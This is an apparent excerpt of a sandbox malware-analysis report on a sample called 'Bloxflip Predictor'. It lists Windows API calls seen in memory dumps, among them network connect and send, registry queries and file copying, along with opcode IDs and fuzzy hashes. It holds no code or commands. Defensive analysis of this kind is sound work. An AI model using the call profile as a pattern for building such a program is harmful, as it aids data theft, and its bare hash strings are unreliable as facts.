                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: NetworkParams
                                            • String ID:
                                            • API String ID: 2134775280-0
                                            • Opcode ID: 8a855bca4a04027c2aad90dca58c660f3c4ff5388c413cd6cb14cc4281c07789
                                            • Instruction ID: d97025af29039c83d70e5ea700a881f8fcfe991f75febb580ec674284f084c95
                                            • Opcode Fuzzy Hash: 8a855bca4a04027c2aad90dca58c660f3c4ff5388c413cd6cb14cc4281c07789
                                            • Instruction Fuzzy Hash: E201A175510204AFEB218F01DC85FA6F7ECEF28728F04809AEE489B741D674E5088AB5
                                            APIs
                                            • CopyFileW.KERNEL32(?,?,?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BB1E6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CopyFile
                                            • String ID:
                                            • API String ID: 1304948518-0
                                            • Opcode ID: a2e19c3a45570d0f400289412bab4100429c7d78ef9d97596b3778e0e62b54fc
                                            • Instruction ID: 22efa98de4b3d0a591cf0328da8c8e2f3b6ae96c1e7cd06f1547b26eaf57c02d
                                            • Opcode Fuzzy Hash: a2e19c3a45570d0f400289412bab4100429c7d78ef9d97596b3778e0e62b54fc
                                            • Instruction Fuzzy Hash: 0911C8716042408FEB24CF29D885BA6FBD8EF14220F08C4AADD09CBB42D334E404CB75
                                            APIs
                                            • GetFileType.KERNEL32(?,00000E24,39EDB950,00000000,00000000,00000000,00000000), ref: 05EE0659
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID:
                                            • API String ID: 3081899298-0
                                            • Opcode ID: 0f64e16e14f6523d16702434dd2cb41abd76c33423162237d8365a0cac90ac80
                                            • Instruction ID: 72d5c2694cd8db41ec9d6b117f4b758de4c8d7ea80aaac29a54d6cfe609ea469
                                            • Opcode Fuzzy Hash: 0f64e16e14f6523d16702434dd2cb41abd76c33423162237d8365a0cac90ac80
                                            • Instruction Fuzzy Hash: 8901C071500204AFEB21CB12DC89FA6B7A8DF65724F08C09AED488BB41D6B4E4088AB5
                                            APIs
                                            • WaitForInputIdle.USER32(?,?), ref: 011BB5B3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: IdleInputWait
                                            • String ID:
                                            • API String ID: 2200289081-0
                                            • Opcode ID: fa54089c8d3a6341f4dd5c9977667a8ad4d6717894fb7b2fff88315aa508b7ca
                                            • Instruction ID: 5dda868106f387d408dda0bac467f7441bcafd719a102207cb257661323eee33
                                            • Opcode Fuzzy Hash: fa54089c8d3a6341f4dd5c9977667a8ad4d6717894fb7b2fff88315aa508b7ca
                                            • Instruction Fuzzy Hash: 48115E715093849FDB22CF65DC84B52BFA4EF46320F0984DAED858F262D275A808CB62
                                            APIs
                                            • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05EE2932
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Connect
                                            • String ID:
                                            • API String ID: 3144859779-0
                                            • Opcode ID: 9b7235b5a7678c5775d8bc682e6b31ca6075f75dfee1e28cc8f871b72cb977ca
                                            • Instruction ID: feb345cb9002989275546688fd703907d60aab81a1fc60ae1dd4ef9e6e80de84
                                            • Opcode Fuzzy Hash: 9b7235b5a7678c5775d8bc682e6b31ca6075f75dfee1e28cc8f871b72cb977ca
                                            • Instruction Fuzzy Hash: D41182355006449FDB20CF55D844B62FBE9FF08314F08D49AEE899B661D332E418DF61
                                            APIs
                                            • SetErrorMode.KERNEL32(?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BAB50
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 0fd946c6f596ffaddd5bb05de7e502433bb135c6174ed7c5d8447f54348f0c52
                                            • Instruction ID: e91d2299c7c0867704eaf15ffbb23402ffb4bce1fd4a1500b45e470bbfeca597
                                            • Opcode Fuzzy Hash: 0fd946c6f596ffaddd5bb05de7e502433bb135c6174ed7c5d8447f54348f0c52
                                            • Instruction Fuzzy Hash: F61188715093C4AFD7128B15DD44B62FFB4DF46624F0C84DAED854B253D275A808CB72
                                            APIs
                                            • GetVolumeInformationA.KERNEL32(?,00000E24,?,?), ref: 05EE1A9A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationVolume
                                            • String ID:
                                            • API String ID: 2039140958-0
                                            • Opcode ID: 79429dcba87639254803657dcec28d5ccee6f06fd0c4b1d001ac6d72b12ec89f
                                            • Instruction ID: 7365e86da40ee39e3a0cda4963bedbf9ea70fab53a6390e239d8c6f1a1988ce6
                                            • Opcode Fuzzy Hash: 79429dcba87639254803657dcec28d5ccee6f06fd0c4b1d001ac6d72b12ec89f
                                            • Instruction Fuzzy Hash: B2019E71640205ABD310DF16CC45B66FBE8EB88A20F14815AED089B742D731F915CBE1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05EE3FBE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: b814a13419067c91b6ab49e8eba62acb31329a72a2b24dfa38d52edbc6ebdc46
                                            • Instruction ID: 805f2e59542c9fb8597cad9416f8951c8441b8b27e793e6d407bac21ead70cbd
                                            • Opcode Fuzzy Hash: b814a13419067c91b6ab49e8eba62acb31329a72a2b24dfa38d52edbc6ebdc46
                                            • Instruction Fuzzy Hash: 05016D329106409FDB21CF55D845BA2FBF5EF48324F08889AEE894B652D376F418DF62
                                            APIs
                                            • RasEnumConnectionsW.RASAPI32(?,00000E24,?,?), ref: 05EE0B92
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ConnectionsEnum
                                            • String ID:
                                            • API String ID: 3832085198-0
                                            • Opcode ID: 2c6ea8fe51cec817b393bbaba87c9b457bf8979b69ea28be7642efa8df46decf
                                            • Instruction ID: 73cc282f0266d3607714f55745a6eab70bcc8e156d5b29dff0ad512c66b8a4a5
                                            • Opcode Fuzzy Hash: 2c6ea8fe51cec817b393bbaba87c9b457bf8979b69ea28be7642efa8df46decf
                                            • Instruction Fuzzy Hash: 0D01A271540205ABD310DF16CC46B66FBE8FF98A20F14815AED089BB41D731F915CBE5
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,?,?), ref: 05EE0ABE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4507502153.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5ee0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 8a1ac2c0712907aa4b2e7bc474c136a93fb3623912bbd7cb175d2d2271e3baf8
                                            • Instruction ID: 976354c29d00fb399551f536d0e238d232832cea122f73304b9a96849f7279b1
                                            • Opcode Fuzzy Hash: 8a1ac2c0712907aa4b2e7bc474c136a93fb3623912bbd7cb175d2d2271e3baf8
                                            • Instruction Fuzzy Hash: AF01A271540205ABD310DF16CC46B66FBE8FF98A20F14815AED089BB42D771F915CBE5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: 4da9920f38b08306c4ebe307301a79c1f9f14a69ff0f3d57687d7487f8e80180
                                            • Instruction ID: fe68b28882c25d0cfe2e67230b598e5f8680f4a6a8e3d624c9e5ef1a942eead3
                                            • Opcode Fuzzy Hash: 4da9920f38b08306c4ebe307301a79c1f9f14a69ff0f3d57687d7487f8e80180
                                            • Instruction Fuzzy Hash: BD01BC319002409FDB64CF55E884BA2FBE4EF08324F08C4AADE498B652D375E408CFB2
                                            APIs
                                            • WaitForInputIdle.USER32(?,?), ref: 011BB5B3
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: IdleInputWait
                                            • String ID:
                                            • API String ID: 2200289081-0
                                            • Opcode ID: b503d382716a74ee4b7ff10f05d9e8500ae4bc9c2a7046379d33e82901f24397
                                            • Instruction ID: 317529bc18dad1ccdaddfea60a619ce8c81fa9465bf79fff2e3b0c4d5bc88ab2
                                            • Opcode Fuzzy Hash: b503d382716a74ee4b7ff10f05d9e8500ae4bc9c2a7046379d33e82901f24397
                                            • Instruction Fuzzy Hash: 7E018B719082449FDB24CF15D884BA6FBE4EF05320F08C4AADD498F652D375E408CAA2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: ee2cefc9549ba1d1d3d676310eb3ce18a26259c66d79ea45d95186e3852384de
                                            • Instruction ID: c72d02e1e68c4923d5b46da5e777bd9a30f7823fa3642e77ea34ee1998d79dbb
                                            • Opcode Fuzzy Hash: ee2cefc9549ba1d1d3d676310eb3ce18a26259c66d79ea45d95186e3852384de
                                            • Instruction Fuzzy Hash: 0E01AD719042449FDB24CF15E8887A2FBE4EF05220F08C4AADD498F342D379E408CEA2
                                            APIs
                                            • SetErrorMode.KERNEL32(?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BAB50
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: f87695ce071dc3420a22af2674232c9fbf3a55c6d0b2371ef75c0ca9a4747eb4
                                            • Instruction ID: 2d723a23e4a3c619b905a440e9f0fecf13d0e8b7eaf79ea34f6404cc050fd6e0
                                            • Opcode Fuzzy Hash: f87695ce071dc3420a22af2674232c9fbf3a55c6d0b2371ef75c0ca9a4747eb4
                                            • Instruction Fuzzy Hash: A1F0A9759042449FDB248F0AE985BA2FBE4EF05320F08C4DADD494B752D3B9E408CEA2
                                            APIs
                                            • CloseHandle.KERNEL32(?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BA290
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 33a0fc8432bea136b1820e3ea30af1edc7de57f4353ab044739d10f225cfc7a4
                                            • Instruction ID: c5d5568b8bd457a391ee61ab149ea0cde67a1e4d345980395abb2296d8c8fb08
                                            • Opcode Fuzzy Hash: 33a0fc8432bea136b1820e3ea30af1edc7de57f4353ab044739d10f225cfc7a4
                                            • Instruction Fuzzy Hash: 1611A3715093C4AFDB128B25DC95B52BFA8DF46220F0884DBED858F653D275A808CB62
                                            APIs
                                            • CloseHandle.KERNEL32(?,39EDB950,00000000,?,?,?,?,?,?,?,?,6C973C58), ref: 011BA290
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504267955.00000000011BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_11ba000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 10ce599b0bdf9cd255a37203f36bc2578981a381909d59428521cd72bab8c4f0
                                            • Instruction ID: c0e353354d28ea76553f1f3658c49fb464a82a063a5fd7efb39c7e1d012afc65
                                            • Opcode Fuzzy Hash: 10ce599b0bdf9cd255a37203f36bc2578981a381909d59428521cd72bab8c4f0
                                            • Instruction Fuzzy Hash: F5018F71A042449FDB64CF59E8857A6FBE4DF05220F08C4EADD498F756D375E408CEA2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9833d66725512b29b48530df3681d59fda43fffb8abe9ea356cd43005cdf3ef7
                                            • Instruction ID: 368c6abcd8dc0c99642f2ccf5f83315debc7e23c0c104639c8e1775ccf8cd21e
                                            • Opcode Fuzzy Hash: 9833d66725512b29b48530df3681d59fda43fffb8abe9ea356cd43005cdf3ef7
                                            • Instruction Fuzzy Hash: FCE10734A00315CFDB24DF38E859BA977B2FB89304F1045A9D9099B3A4DB7A9D91CF90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e4f1a6ddb5763046139b067361a52add99eb4b065fb5a99ef4592be845ea7a7
                                            • Instruction ID: d5039a68ed772e85978b3973f3d1b8dd50789bf1944bc435325b41ba8549dfd7
                                            • Opcode Fuzzy Hash: 9e4f1a6ddb5763046139b067361a52add99eb4b065fb5a99ef4592be845ea7a7
                                            • Instruction Fuzzy Hash: D9C12931B10304DFCB19DFB8E46A96D77B2EF89305B208969C505973A4DB399C92CB90
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c14d8d41f96579c21f0ac2cca97ccf765d8fa2a2d240913ae051af7d705d3599
                                            • Instruction ID: 5eed2dedac5276b83ac9893bcba9f657e7a70e108cf3fc17cd9afe044b0c9449
                                            • Opcode Fuzzy Hash: c14d8d41f96579c21f0ac2cca97ccf765d8fa2a2d240913ae051af7d705d3599
                                            • Instruction Fuzzy Hash: 2EC12A30710304DFDB19DFB8E46AA6D77B2EF89305B208A68C505973A4DB399C92CBD0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 158223ada3223ef1059b51ab86770adf001048d3010efc287329c061dea9d4db
                                            • Instruction ID: 63261e17c6c8d43c58ac328e7b5658982fedc1bc75f9bf4422ae96a40b125950
                                            • Opcode Fuzzy Hash: 158223ada3223ef1059b51ab86770adf001048d3010efc287329c061dea9d4db
                                            • Instruction Fuzzy Hash: 67B11830710304CFDB19DFB8E56AA6D77B2EB89305B208A69C505973A4DB399C92CBD0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55e510c7856d5b80af4938eef4f63d8ef204ce34b822180b339760499093e792
                                            • Instruction ID: 533ed3b844a4e3a03c1bc8a860097640f5ec6cc388f1ff6a4385f1c4fa94bc32
                                            • Opcode Fuzzy Hash: 55e510c7856d5b80af4938eef4f63d8ef204ce34b822180b339760499093e792
                                            • Instruction Fuzzy Hash: 0DA11930710304CFDB19DFB8E55AA6D77B2FB89305B208A69C505973A5DB3A9C92CBD0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4130aed8f410e124bd9a3faddfc2cf4319bdf8b040a2cd05a1b36dd2a08ced07
                                            • Instruction ID: ea02157b2e5cdacc4e4e87be569048c154d21384921cac7cd37627a3c1107571
                                            • Opcode Fuzzy Hash: 4130aed8f410e124bd9a3faddfc2cf4319bdf8b040a2cd05a1b36dd2a08ced07
                                            • Instruction Fuzzy Hash: 5D91C131710240CFDB189B38E42867D7BA7EBA8748F208429D81697794CF799C55CBE1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e3f0475cdc67fd2c9f1901f9c7b3d6f0b0034f0afadd342d5c69fbdf3e01253e
                                            • Instruction ID: f0afc6b7ad12d92ffe857ad4b31b1ad120321e50df04bcf45125b3eeeab35d33
                                            • Opcode Fuzzy Hash: e3f0475cdc67fd2c9f1901f9c7b3d6f0b0034f0afadd342d5c69fbdf3e01253e
                                            • Instruction Fuzzy Hash: 22911F30B107008BD728DB7DE859BA837E2EB99354F148628D5169B7D0EFB8EC14CB81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89800c1b04d507ea60f6981311f8f8ce6c0a593463a71bff63cb25b7310dfc4d
                                            • Instruction ID: c5b6735e89646c88df88c01cee15d7554c07c3ad4a54efca4a86d0440f05cd84
                                            • Opcode Fuzzy Hash: 89800c1b04d507ea60f6981311f8f8ce6c0a593463a71bff63cb25b7310dfc4d
                                            • Instruction Fuzzy Hash: 2C717131310240CFEB19AB38E42977D77A7EBA8748B208469D80697794CF7D8C55CBE1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 090618a680407530460ec0a5595f5edee29b3568f807c80833400fd42ca4a089
                                            • Instruction ID: cac60fb9d3fc954c2d7e19f75467ab0d2522020e6004a265c069efbb8ce4b279
                                            • Opcode Fuzzy Hash: 090618a680407530460ec0a5595f5edee29b3568f807c80833400fd42ca4a089
                                            • Instruction Fuzzy Hash: 2A7181313102408FEB19AB38E42977E37A7EBA8748F208469D80697794CF7D8C55CBE1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9cde840bacec8265d1f04f7ca5e38cad2d674892ee496706246ca26f5cc20023
                                            • Instruction ID: 2425dafade8a9def16b099b9bde95e00312a9ee0c65a2c285b766c8531417950
                                            • Opcode Fuzzy Hash: 9cde840bacec8265d1f04f7ca5e38cad2d674892ee496706246ca26f5cc20023
                                            • Instruction Fuzzy Hash: E27181313102408FEB19AB38E42977E37A7EBA8748F208469D80697794CF7D8C55CBE1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b76a8bb5816520bef04a5ff11eae7b54cd824930c7be0380a65384639acb2783
                                            • Instruction ID: 92f18d7ddef467b2c05ff4c090a41e4d93028101185cbf398b629b5cbca84bf0
                                            • Opcode Fuzzy Hash: b76a8bb5816520bef04a5ff11eae7b54cd824930c7be0380a65384639acb2783
                                            • Instruction Fuzzy Hash: 60818F3031A782CFC305DB38F46D59A7BB2FBA534870489A9D0408B269DB7C9C59CBE1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bd4cd18ce156cdef1dc553700dc6def2cdef7a221156e54f09bfe3aba2bae11
                                            • Instruction ID: bf3abaa96f9844a4de2495db87230bbcc409c2e97ff31c50fe0dafdce330d104
                                            • Opcode Fuzzy Hash: 4bd4cd18ce156cdef1dc553700dc6def2cdef7a221156e54f09bfe3aba2bae11
                                            • Instruction Fuzzy Hash: 8D51E530B112019BEB18AB78D8197BE7697EBE4308F258439D5059BBD4CF79CC19C7A2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3a2fffbfa0a8c4823c813be82f46885f282da6b65d7ef5ad69905a760279e208
                                            • Instruction ID: 86d3e6e25ee0a292576b4fd244af29ce0c836eb7d5a84a3c7f633aa10cbab8c5
                                            • Opcode Fuzzy Hash: 3a2fffbfa0a8c4823c813be82f46885f282da6b65d7ef5ad69905a760279e208
                                            • Instruction Fuzzy Hash: 81715930A00315CFDB24DB78E859BACB772FB54308F1045A9D9196B3A4DB7A5D91CFA0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ed09486e1a3fa271370d0d7fc230d45f515e835b585703d6c18858eef830df3
                                            • Instruction ID: e4ebd950c5c5e19ab0ebe3f72199743cc4d40c80939c3028cc58ca075ed6a6cd
                                            • Opcode Fuzzy Hash: 4ed09486e1a3fa271370d0d7fc230d45f515e835b585703d6c18858eef830df3
                                            • Instruction Fuzzy Hash: 3F512F31B10205CFDB18DFB8E4A9A6DB7B2EF88304F148929C515973A4DB789C52CBD0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0269102d9949e6c6ca429f9d14b273c136507553f8b4f8261cedf313b274ebd4
                                            • Instruction ID: 7ca36013cba68755a1e49bb4db5930ea01c04c35412676306c5d2106cdc03c3f
                                            • Opcode Fuzzy Hash: 0269102d9949e6c6ca429f9d14b273c136507553f8b4f8261cedf313b274ebd4
                                            • Instruction Fuzzy Hash: 20411130A10780CFEB29CF3EE8497A97BE2EB85354F248268D5219B6D1DB799C51CB50
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b62fbfd5263f8af213b9038bcd331a14246e93f1e89c22fa7dbed9cabba8c65c
                                            • Instruction ID: 791b88908b50a918e4404adf5ccb2a81bb0e7906f29ae886280a929dbb8f422e
                                            • Opcode Fuzzy Hash: b62fbfd5263f8af213b9038bcd331a14246e93f1e89c22fa7dbed9cabba8c65c
                                            • Instruction Fuzzy Hash: CA411330B10780CFEB29DF3EE8193A837E2EB95354F188268D1219B6D0DBB99C51CB55
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0074953d975c4799fe847e4bd9ec83dd30d667d22000da9de839a20a0a74e28
                                            • Instruction ID: 980ec4a159a1be496df7e6bee3db5104447f5893af47782c0c1c6fc3a4439f64
                                            • Opcode Fuzzy Hash: e0074953d975c4799fe847e4bd9ec83dd30d667d22000da9de839a20a0a74e28
                                            • Instruction Fuzzy Hash: 0231E330B10205DFDB14CB78D859BAEBBF6AF89304F208079E505DB3A1DB719C088B91
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.4504806735.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_12d0000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75ba5c69298e3fea13eeab02fe2db9856bfb45e3432641a32bf3a2094f0ff590
                                            • Instruction ID: 42ccabfa65dd11efab9e6dca13033d74f07bd614a3cd7aed85434c36434ee9ec
                                            • Opcode Fuzzy Hash: 75ba5c69298e3fea13eeab02fe2db9856bfb45e3432641a32bf3a2094f0ff590
                                            • Instruction Fuzzy Hash: F7311B35B10205CFDB18DBB8E4A9A6DB7B2FB88304B148929C41597358DB389C92CBC1
                                            Memory Dump Source
